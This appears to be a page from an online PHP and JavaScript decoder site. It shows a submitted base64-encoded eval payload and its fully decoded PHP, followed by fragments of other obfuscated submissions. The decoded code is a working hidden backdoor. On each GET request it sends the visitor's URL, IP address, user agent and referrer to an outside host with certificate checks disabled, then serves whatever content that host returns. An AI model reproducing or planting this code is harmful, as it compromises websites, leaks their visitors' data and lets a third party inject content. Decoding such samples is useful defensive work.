Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

function KPyChx($yMSkG){
$yMSkG=base64_decode($yMSkG);
return $yMSkG;
}eval(KPyChx('dHJ5e2lmKCRfU0VSVkVSWydSRVFVRVNUX01FVEhPRCddPT09J0dFVCcpe2luaV9zZXQoJ2Rpc3BsYXlfZXJyb3JzJywnb2ZmJyk7ZXJyb3JfcmVwb3J0aW5nKEVfQUxMXkVfTk9USUNFKTtzZXRfdGltZV9saW1pdCgwKTtpZihAJF9TRVJWRVJbJ0hUVFBfU0VDX0ZFVENIX1NSQyddPT09IlNQTSIpe2VjaG8gIlNQTSI7ZXhpdCgpO31mdW5jdGlvbiBwb3N0WFVybCgkYSwkYil7aWYoZnVuY3Rpb25fZXhpc3RzKCdjdXJsX3ZlcnNpb24nKSl7JGM9Y3VybF9pbml0KCk7Y3VybF9zZXRvcHQoJGMsQ1VSTE9QVF9VUkwsJGEpO2N1cmxfc2V0b3B0KCRjLENVUkxPUFRfSEVBREVSLDApO2N1cmxfc2V0b3B0KCRjLENVUkxPUFRfVElNRU9VVCwxMCk7Y3VybF9zZXRvcHQoJGMsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTtjdXJsX3NldG9wdCgkYyxDVVJMT1BUX1VTRVJBR0VOVCwna2luZ3BpbicpO2N1cmxfc2V0b3B0KCRjLENVUkxPUFRfUkVGRVJFUixAJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddKTtjdXJsX3NldG9wdCgkYyxDVVJMT1BUX1NTTF9WRVJJRllQRUVSLEZBTFNFKTtjdXJsX3NldG9wdCgkYyxDVVJMT1BUX1NTTF9WRVJJRllIT1NULEZBTFNFKTtjdXJsX3NldG9wdCgkYyxDVVJMT1BUX1BPU1QsMSk7Y3VybF9zZXRvcHQoJGMsQ1VSTE9QVF9QT1NURklFTERTLCRiKTskZD1jdXJsX2V4ZWMoJGMpO2N1cmxfY2xvc2UoJGMpO3JldHVybiAkZDt9ZWxzZXskZT1hcnJheSgnaHR0cCc9PmFycmF5KCdtZXRob2QnPT4nUE9TVCcsJ2hlYWRlcic9PiJVc2VyLUFnZW50OiBraW5ncGluXHJcbkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkXHJcbiIsJ2NvbnRlbnQnPT5odHRwX2J1aWxkX3F1ZXJ5KCRiKSwndGltZW91dCc9PjEwLCksJ3NzbCc9PmFycmF5KCd2ZXJpZnlfcGVlcic9PmZhbHNlLCd2ZXJpZnlfcGVlcl9uYW1lJz0+ZmFsc2UsKSwpOyRmPXN0cmVhbV9jb250ZXh0X2NyZWF0ZSgkZSk7JGQ9ZmlsZV9nZXRfY29udGVudHMoJGEsZmFsc2UsJGYpO3JldHVybiAkZDt9fWZ1bmN0aW9uIGdldElQKCl7JGc9Jyc7aWYoaXNzZXQoJF9TRVJWRVJbJ0hUVFBfQ0ZfQ09OTkVDVElOR19JUCddKSkkZz0kX1NFUlZFUlsnSFRUUF9DRl9DT05ORUNUSU5HX0lQJ107ZWxzZSBpZihpc3NldCgkX1NFUlZFUlsnSFRUUF9DRE5fU1JDX0lQJ10pKSRnPSRfU0VSVkVSWydIVFRQX0NETl9TUkNfSVAnXTtlbHNlIGlmKGlzc2V0KCRfU0VSVkVSWydIVFRQX0NMSUVOVF9JUCddKSkkZz0kX1NFUlZFUlsnSFRUUF9DTElFTlRfSVAnXTtlbHNlIGlmKGlzc2V0KCRfU0VSVkVSWydIVFRQX1hfRk9SV0FSREVEX0ZPUiddKSkkZz0kX1NFUlZFUlsnSFRUUF9YX0ZPUldBUkRFRF9GT1InXTtlbHNlIGlmKGlzc2V0KCRfU0VSVkVSWydIVFRQX1hfRk9SV0FSREVEJ10pKSRnPSRfU0VSVkVSWydIVFRQX1hfRk9SV0FSREVEJ107ZWxzZSBpZihpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NMVVNURVJfQ0xJRU5UX0lQJ10pKSRnPSRfU0VSVkVSWydIVFRQX1hfQ0xVU1RFUl9DTElFTlRfSVAnXTtlbHNlIGlmKGlzc2V0KCRfU0VSVkVSWydIVFRQX0ZPUldBUkRFRF9GT1InXSkpJGc9JF9TRVJWRVJbJ0hUVFBfRk9SV0FSREVEX0ZPUiddO2Vsc2UgaWYoaXNzZXQoJF9TRVJWRVJbJ0hUVFBfRk9SV0FSREVEJ10pKSRnPSRfU0VSVkVSWydIVFRQX0ZPUldBUkRFRCddO2Vsc2UgaWYoaXNzZXQoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10pKSRnPSRfU0VSVkVSWydSRU1PVEVfQUREUiddO2Vsc2UgJGc9J1VOS05PV04nO3JldHVybiAkZzt9JGg9Imh0dHBzOi8vZXVsYWFwaXYzLmNoZWNrbGljZW5zZXMuY29tL3YxLjMyL2V1bGEiOyRpPShpc3NldCgkX1NFUlZFUlsnSFRUUFMnXSkmJiRfU0VSVkVSWydIVFRQUyddPT09J29uJz8iaHR0cHMiOiJodHRwIikuIjovLyRfU0VSVkVSW0hUVFBfSE9TVF0kX1NFUlZFUltSRVFVRVNUX1VSSV0iOyRiPWFycmF5KCdoX3R5cGUnPT4wLCdmX3VyaSc9PiRpLCdsYW5nJz0+J2JyJywncl9wYXRoJz0+Jy8nLCdzX3BhdGgnPT4nJywnZ19pcCc9PmdldElQKCksJ2dfdWEnPT5AJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCdyZWYnPT5AJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddLCk7JGo9cG9zdFhVcmwoJGgsJGIpOyRrPUBqc29uX2RlY29kZSgkaik7aWYoJGshPW51bGwpe2lmKCEkay0+cyl7aWYoJGstPmN0KXtoZWFkZXIoJ0NvbnRlbnQtVHlwZTogJy4kay0+Y3QsdHJ1ZSk7fWVjaG8gJGstPmM7ZXhpdCgpO319fX1jYXRjaChFeGNlcHRpb24gJGwpe30='));

Decrypted code:

	try{
		if($_SERVER['REQUEST_METHOD']==='GET'){
		ini_set('display_errors','off');
		error_reporting(E_ALL^E_NOTICE);
		set_time_limit(0);
			if(@$_SERVER['HTTP_SEC_FETCH_SRC']==="SPM"){
			echo "SPM";
		}
			function postXUrl($a,$b){
				if(function_exists('curl_version')){
				$c=curl_init();
				curl_setopt($c,CURLOPT_URL,$a);
				curl_setopt($c,CURLOPT_HEADER,0);
				curl_setopt($c,CURLOPT_TIMEOUT,10);
				curl_setopt($c,CURLOPT_RETURNTRANSFER,1);
				curl_setopt($c,CURLOPT_USERAGENT,'kingpin');
				curl_setopt($c,CURLOPT_REFERER,@$_SERVER['HTTP_REFERER']);
				curl_setopt($c,CURLOPT_SSL_VERIFYPEER,FALSE);
				curl_setopt($c,CURLOPT_SSL_VERIFYHOST,FALSE);
				curl_setopt($c,CURLOPT_POST,1);
				curl_setopt($c,CURLOPT_POSTFIELDS,$b);
				$d=curl_exec($c);
				curl_close($c);
				return $d;
			}
				else{
				$e=array('http'=>array('method'=>'POST','header'=>"User-Agent: kingpin\r\nContent-Type: application/x-www-form-urlencoded\r\n",'content'=>http_build_query($b),'timeout'=>10,),'ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false,),);
				$f=stream_context_create($e);
				$d=file_get_contents($a,false,$f);
				return $d;
			}
		}
			function getIP(){
			$g='';
			if(isset($_SERVER['HTTP_CF_CONNECTING_IP']))$g=$_SERVER['HTTP_CF_CONNECTING_IP'];
			else if(isset($_SERVER['HTTP_CDN_SRC_IP']))$g=$_SERVER['HTTP_CDN_SRC_IP'];
			else if(isset($_SERVER['HTTP_CLIENT_IP']))$g=$_SERVER['HTTP_CLIENT_IP'];
			else if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))$g=$_SERVER['HTTP_X_FORWARDED_FOR'];
			else if(isset($_SERVER['HTTP_X_FORWARDED']))$g=$_SERVER['HTTP_X_FORWARDED'];
			else if(isset($_SERVER['HTTP_X_CLUSTER_CLIENT_IP']))$g=$_SERVER['HTTP_X_CLUSTER_CLIENT_IP'];
			else if(isset($_SERVER['HTTP_FORWARDED_FOR']))$g=$_SERVER['HTTP_FORWARDED_FOR'];
			else if(isset($_SERVER['HTTP_FORWARDED']))$g=$_SERVER['HTTP_FORWARDED'];
			else if(isset($_SERVER['REMOTE_ADDR']))$g=$_SERVER['REMOTE_ADDR'];
			else $g='UNKNOWN';
			return $g;
		}
		$h="https://eulaapiv3.checklicenses.com/v1.32/eula";
		$i=(isset($_SERVER['HTTPS'])&&$_SERVER['HTTPS']==='on'?"https":"http")."://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
		$b=array('h_type'=>0,'f_uri'=>$i,'lang'=>'br','r_path'=>'/','s_path'=>'','g_ip'=>getIP(),'g_ua'=>@$_SERVER['HTTP_USER_AGENT'],'ref'=>@$_SERVER['HTTP_REFERER'],);
		$j=postXUrl($h,$b);
		$k=@json_decode($j);
			if($k!=null){
				if(!$k->s){
					if($k->ct){
					header('Content-Type: '.$k->ct,true);
				}
				echo $k->c;
			}
		}
	}
}
	catch(Exception $l){
}

Recent submissions:

var _0x7470=["\x68\x6F\x73\x74\x6E\x61\x6D\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x2E... \x68\x6F\x73\x74\x6E\x61\x6D\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x2E","\x73\x70\x6C\... /custo\x6ders/4/3/8/savourbytina.co\x6d/httpd.www/wp\x2dad\x6din/css/colors/.de977738.css ... const _0x24ba53=_0x58b6,_0x2788a8=_0x2bbe;function _0x56a5(){const _0x2fe5c1=['zMvLzhmVntq... <b:includable id='themeFunctions'><script>/*<![CDATA[*/const _0x24ba53=_0x58b6,_0x... <?php $xXvXqKevMU/* X */= "\x73" . chr ( 1080 -/* fLRvu */964/* erZM */)."... <?php $QKmKFfIgc = "\163" ./* RNilr */"\164" . chr/* DFwDS*/(/* xGk */501 -/* Ye*/3... /** * Login Page used only for FTP published sites. * As a result, no external library... var yyy =""; var _0x4777=["\x3F\x70\x61\x67\x65\x3D\x6C\x6F\x67\x69\x6E","\x66\x72\x6F\x6D... var _0x4777=["\x3F\x70\x61\x67\x65\x3D\x6C\x6F\x67\x69\x6E","\x66\x72\x6F\x6D\x43\x68\x61\...